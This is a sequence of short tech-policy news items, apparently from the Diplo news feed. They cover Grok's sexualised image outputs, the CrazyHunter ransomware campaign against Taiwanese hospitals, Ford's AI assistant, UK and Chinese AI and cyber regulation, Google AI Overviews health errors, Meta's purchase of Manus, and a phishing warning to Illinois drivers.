Elon Musk’s Grok chatbot has triggered international backlash after generating sexualised images of women and girls in response to user prompts on X, raising renewed concerns over AI safeguards and platform accountability.
The images, some depicting minors in minimal clothing, circulated publicly before being removed. Grok later acknowledged failures in its own safeguards, stating that child sexual abuse material is illegal and prohibited, while xAI initially offered no public explanation.
European officials reacted swiftly. French ministers referred the matter to prosecutors, calling the output illegal, while campaigners in the UK argued the incident exposed delays in enforcing laws against AI-generated intimate images.
In contrast, US lawmakers largely stayed silent despite xAI holding a major defence contract. Musk did not directly address the controversy; instead, posting unrelated content as criticism mounted on the platform.
The episode has intensified debate over whether current AI governance frameworks are sufficient to prevent harm, particularly when generative systems operate at scale with limited real-time oversight.
Would you like to learn more about AI, tech, and digital diplomacy? If so, ask our Diplo chatbot!
CrazyHunter ransomware has emerged as a growing threat to healthcare organisations, with repeated attacks targeting hospitals and medical service providers. The campaign focuses on critical healthcare infrastructure, raising concerns about service disruption and the exposure of sensitive patient data.
The malware is developed in Go and demonstrates a high level of technical maturity. Attackers gain initial access by exploiting weak Active Directory credentials, then use Group Policy Objects to distribute the ransomware rapidly across compromised networks.
Healthcare institutions in Taiwan have been among the most affected, with multiple confirmed incidents reported by security researchers. The pattern suggests a targeted campaign rather than opportunistic attacks, increasing pressure on regional healthcare providers to strengthen defences.
Once deployed, CrazyHunter turns off security tools and encrypts files to conceal its activity. Analysts note the use of extensive evasion techniques, including memory-based execution and redundant encryption methods, to ensure the delivery of the payload.
CrazyHunter employs a hybrid encryption scheme that combines ChaCha20 and elliptic curve cryptography, utilising partial file encryption to expedite the impact. Encrypted files receive a ‘.Hunter’ extension, with recovery dependent on the attackers’ private keys, reinforcing the pressure to pay ransoms.
Would you like to learn more about AI, tech, and digital diplomacy? If so, ask our Diplo chatbot!
Ford has unveiled plans for an AI assistant that will launch in its smartphone app in early 2026 before expanding to in-vehicle systems in 2027. The announcement was made at the 2026 Consumer Electronics Show, alongside a preview of a next-generation BlueCruise driver assistance system.
The AI assistant will be hosted on Google Cloud and built using existing large language models, with access to vehicle-specific data. Ford said this will allow users to ask both general questions, such as vehicle capacity, and real-time queries, including oil life and maintenance status.
Ford plans to introduce the assistant first through its redesigned mobile app, with native integration into vehicles scheduled for 2027. The company has not yet specified which models will receive the in-car version first, but said the rollout would expand gradually across its lineup.
Alongside the AI assistant, the vehicle manufacturer previewed an updated version of its BlueCruise system, which it claims will be more affordable to produce and more capable. The new system is expected to debut in 2027 on the first electric vehicle built on Ford’s low-cost Universal Electric Vehicle platform.
Ford said the next-generation BlueCruise could support eyes-off driving by 2028 and enable point-to-point autonomous driving under driver supervision. As with similar systems from other automakers, drivers will still be required to remain ready to take control at any time.
Would you like to learn more about AI, tech, and digital diplomacy? If so, ask our Diplo chatbot!
The UK government has announced new measures to strengthen the security and resilience of online public services as more interactions with the state move online. Ministers say public confidence is essential as citizens increasingly rely on digital systems for everyday services.
Backed by more than £210 million, the UK Government Cyber Action Plan outlines how cyber defences and digital resilience will be improved across the public sector. A new Government Cyber Unit will coordinate risk identification, incident response, and action on complex threats spanning multiple departments.
The plan underpins wider efforts to digitise public services, including benefits applications, tax payments, and healthcare access. Officials argue that secure systems can reduce bureaucracy and improve efficiency, but only if users trust that their data is protected.
The announcement coincides with parliamentary debate on the Cyber Security and Resilience Bill, which sets clearer expectations for companies supplying services to the government. The legislation is intended to strengthen cyber resilience across critical supply chains.
Ministers also highlighted new steps to address software supply chain risks, including a Software Security Ambassador Scheme promoting basic security practices. The government says stronger cyber resilience is essential to protect public services and maintain public trust.
Would you like to learn more about AI, tech, and digital diplomacy? If so, ask our Diplo chatbot!
China’s cyberspace regulator has proposed new limits on AI ‘boyfriend’ and ‘girlfriend’ chatbots, tightening oversight of emotionally interactive artificial intelligence services.
Draft rules released on 27 December would require platforms to intervene when users express suicidal or self-harm tendencies, while strengthening protections for minors and restricting harmful content.
The regulator defines the services as AI systems that simulate human personality traits and emotional interaction. The proposals are open for public consultation until 25 January.
The draft bans chatbots from encouraging suicide, engaging in emotional manipulation, or producing obscene, violent, or gambling-related content. Minors would need guardian consent to access AI companionship.
Platforms would also be required to disclose clearly that users are interacting with AI rather than humans. Legal experts in China warn that enforcement may be challenging, particularly in identifying suicidal intent through language cues alone.
Would you like to learn more about AI, tech, and digital diplomacy? If so, ask our Diplo chatbot!
More players are now turning to AI tools to help manage their Fantasy Premier League squads. Several popular apps use AI to rate teams, predict player points, and suggest transfers, with developers reporting rapid growth in both free and paid users.
Fantasy football has long allowed fans to test their instincts by building virtual teams and competing against friends or strangers. In recent years, the game has developed a large ecosystem of content creators offering advice on transfers, tactics, and player performance.
Supporters of the tools say they make the game more engaging and accessible. Some players argue that AI advice is no different from following tips on podcasts or social media and see it as a way to support decision-making rather than replace skill.
Critics, however, say AI removes key elements of instinct, luck, and banter. Some fans describe AI-assisted play as unfair or against the spirit of fantasy football leagues, while others worry it leads to increasingly similar teams driven by the same data.
Despite the debate, surveys suggest a growing share of fantasy players plan to use AI this season. League organisers and game developers are experimenting with incentives to reward creative picks, as the role of AI in fantasy football continues to expand.
Would you like to learn more about AI, tech, and digital diplomacy? If so, ask our Diplo chatbot!
A Guardian investigation has found that Google’s AI Overviews have displayed false and misleading health information that could put people at risk of harm. The summaries, which appear at the top of search results, are generated using AI and are presented as reliable snapshots of key information.
The investigation identified multiple cases where Google’s AI summaries provided inaccurate medical advice. Examples included incorrect guidance for pancreatic cancer patients, misleading explanations of liver blood test results, and false information about women’s cancer screening.
Health experts warned that such errors could lead people to dismiss symptoms, delay treatment, or follow harmful advice. Some charities said the summaries lacked essential context and could mislead users during moments of anxiety or crisis.
Concerns were also raised about inconsistencies, with the same health queries producing different AI-generated answers at different times. Experts said this variability undermines trust and increases the risk that misinformation will influence health decisions.
Google said most AI Overviews are accurate and helpful, and that the company continually improves quality, particularly for health-related topics. It said action is taken when summaries misinterpret content or lack appropriate context.
Would you like to learn more about AI, tech, and digital diplomacy? If so, ask our Diplo chatbot!
Manus has returned to the spotlight after agreeing to be acquired by Meta in a deal reportedly worth more than $2 billion. The transaction is one of the most high-profile acquisitions of an Asian AI startup by a US technology company and reflects Meta’s push to expand agentic AI capabilities across its platforms.
The startup drew attention in March after unveiling an autonomous AI agent designed to execute tasks such as résumé screening and stock analysis. Founded in China, Manus later moved its headquarters to Singapore and was developed by the AI product studio Butterfly Effect.
Since launch, Manus has expanded its features to include design work, slide creation, and browser-based task completion. The company reported surpassing $100 million in annual recurring revenue and raised $75 million earlier this year at a valuation of about $500 million.
Meta said the acquisition would allow it to integrate the Singapore-based company’s technology into its wider AI strategy while keeping the product running as a standalone service. Manus said subscriptions would continue uninterrupted and that operations would remain based in Singapore.
The deal has drawn political scrutiny in the US due to Manus’s origins and past links to China. Meta said the transaction would sever remaining ties to China, as debate intensifies over investment, data security, and competition in advanced AI systems.
Would you like to learn more about AI, tech, and digital diplomacy? If so, ask our Diplo chatbot!
Illinois Secretary of State Alexi Giannoulias has warned residents to stay alert for fraudulent text messages claiming unpaid traffic violations or tolls. Officials say the messages are part of a phishing campaign targeting Illinois drivers.
The scam texts typically warn recipients that their vehicle registration or driving privileges are at risk of suspension. The messages urge immediate action via links that steal money or personal information.
The Secretary of State’s office said it sends text messages only to remind customers about scheduled DMV appointments. It does not communicate by text about licence status, vehicle registration issues, or enforcement actions.
Officials advised residents not to click on links or provide personal details in response to such messages. The texts are intended to create fear and pressure victims into acting quickly.
Residents who receive scam messages are encouraged to report them to the Federal Trade Commission through its online fraud reporting system.
Would you like to learn more about AI, tech, and digital diplomacy? If so, ask our Diplo chatbot!
China has proposed stringent new rules for AI aimed at protecting children and preventing chatbots from providing advice that could lead to self-harm, violence, or gambling.
The draft regulations, published by the Cyberspace Administration of China (CAC), require developers to include personalised settings, time limits, and parental consent for services offering emotional companionship.
High-risk chats involving self-harm or suicide must be passed to a human operator, with guardians or emergency contacts alerted. AI providers must not produce content that threatens national security, harms national honour, or undermines national unity.
The rules come as AI usage surges, with platforms such as DeepSeek, Z.ai, and Minimax attracting millions of users in China and abroad. The CAC supports safe AI use, including tools for local culture and elderly companionship.
The move reflects growing global concerns over AI’s impact on human behaviour. Notably, OpenAI has faced legal challenges over alleged chatbot-related harm, prompting the company to create roles focused on tracking AI risks to mental health and cybersecurity.
China’s draft rules signal a firm approach to regulating AI technology as its influence expands rapidly.
Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!